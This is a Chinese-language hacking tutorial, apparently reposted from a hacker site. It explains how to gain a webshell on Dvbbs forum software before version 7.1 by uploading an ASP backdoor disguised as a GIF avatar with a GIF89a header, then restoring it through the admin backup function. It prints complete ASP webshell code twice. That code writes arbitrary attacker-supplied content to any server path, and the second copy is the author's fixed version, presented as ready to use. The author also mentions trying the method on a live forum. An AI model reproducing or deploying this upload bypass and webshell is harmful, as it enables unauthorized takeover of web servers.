GIF89a结合动网后台(7.1以前)取得webshell的完整解释

文章编辑:NetHacking 来源：http://www.powers.com.cn 作者:喜欢忧伤

背景：

(1)动网上传文件，备份得到后门

(2)使用GIF89a可以上传内容为木马的gif图片：逃过头像上传的检测。

所以产生了新的方法：上传gif头像图片，备份得到木马了。(使用范围为:动网7.1以前的版本)

但是很多人在执行后门后出现的是一张不能显示的图片．

偶还是公布一下我用了恩久的更方便的方法，同时解释一下为什么会出现这种情况．：

就是GIF89a加站长助手，运行后门的时候看到的就是站长助手的界面，唯一的不同就是左上角多了GIF89a几个字。这个方法在一看到背景（2）就用在一个论坛的测试上了。。呵呵

gif内容如下：

-----以下为gif图片内容(GIF89a下面是站长助手的内容,不用多看了)----

GIF89a

<%

'站长助手的内容...省略．．．

%>

</body>

</center>

-----以上为gif图片内容(GIF89a下面是站长助手的内容,不用多看了)----

其实真正问题是这样的：

执行由gif文件恢复过来的asp,最后显示成一张不能显示的图片：

其实这个过程有两个：

(1)asp解释执行

(2)你的浏览器的显示．

(1)是没有问题．

现在问题是出在你的(2)上面的．

(2)出问题的原因是浏览器的解释问题．

解决办法：只要把显示的代码放到<body></body>之间就可以了．

本来是这样的：执行后显示一张不能显示的图片．

GIF89a

<% dim objFSO %>

<% dim fdata %>

<% dim objCountFile %>

<% on error resume next %>

<% Set objFSO = Server.createObject("Scripting.FileSystemObject") %>

<% if Trim(request("syfdpath"))<>"" then %>

<% fdata = request("cyfddata") %>

<% Set objCountFile=objFSO.createTextFile(request("syfdpath"),True) %>

<% objCountFile.Write fdata %>

<% if err =0 then %>

<% response.write "<font color=red>save Success!</font>" %>

<% else %>

<% response.write "<font color=red>Save UnSuccess!</font>" %>

<% end if %>

<% err.clear %>

<% end if %>

<% objCountFile.Close %>

<% Set objCountFile=Nothing %>

<% Set objFSO = Nothing %>

<% Response.write "<form action='' method=post>" %>

<% Response.write "保存文件的<font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font>" %>

<% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>

<% Response.Write "<br>" %>

<% Response.write "本文件绝对路径" %>

<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>

<% Response.write "<br>" %>

<% Response.write "输入马的内容:" %>

<% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %>

<% Response.write "<input type=submit value=保存>" %>

<% Response.write "</form>" %>

修改后：执行正常了。．后门就正常使用了。．哈哈

GIF89a

<body>

<% dim objFSO %>

<% dim fdata %>

<% dim objCountFile %>

<% on error resume next %>

<% Set objFSO = Server.createObject("Scripting.FileSystemObject") %>

<% if Trim(request("syfdpath"))<>"" then %>

<% fdata = request("cyfddata") %>

<% Set objCountFile=objFSO.createTextFile(request("syfdpath"),True) %>

<% objCountFile.Write fdata %>

<% if err =0 then %>

<% response.write "<font color=red>save Success!</font>" %>

<% else %>

<% response.write "<font color=red>Save UnSuccess!</font>" %>

<% end if %>

<% err.clear %>

<% end if %>

<% objCountFile.Close %>

<% Set objCountFile=Nothing %>

<% Set objFSO = Nothing %>

<% Response.write "<form action='' method=post>" %>

<% Response.write "保存文件的<font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font>" %>

<% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>

<% Response.Write "<br>" %>

<% Response.write "本文件绝对路径" %>

<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>

<% Response.write "<br>" %>

<% Response.write "输入马的内容:" %>

<% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %>

<% Response.write "<input type=submit value=保存>" %>

<% Response.write "</form>" %>

</body>